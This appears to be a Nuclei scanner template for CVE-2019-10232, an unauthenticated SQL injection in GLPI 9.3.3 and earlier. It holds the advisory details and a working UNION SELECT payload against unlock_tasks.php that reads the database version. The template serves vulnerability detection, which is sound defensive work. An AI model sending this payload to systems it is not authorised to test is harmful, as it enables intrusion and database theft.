nuclei-templates/http/cves/2019/CVE-2019-10232.yaml

42 lines
1.4 KiB
YAML

id: CVE-2019-10232
info:
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
author: RedTeamBrasil
severity: critical
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature
to alter the semantic original SQL query and retrieve database records.
reference:
- https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
- https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
- https://nvd.nist.gov/vuln/detail/CVE-2019-10232
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-10232
cwe-id: CWE-89
tags: cve,cve2019,glpi,sqli,injection
metadata:
max-request: 2
http:
- method: GET
path:
- "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "-MariaDB-"
- "Start unlock script"
condition: and
extractors:
- type: regex
part: body
regex:
- "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"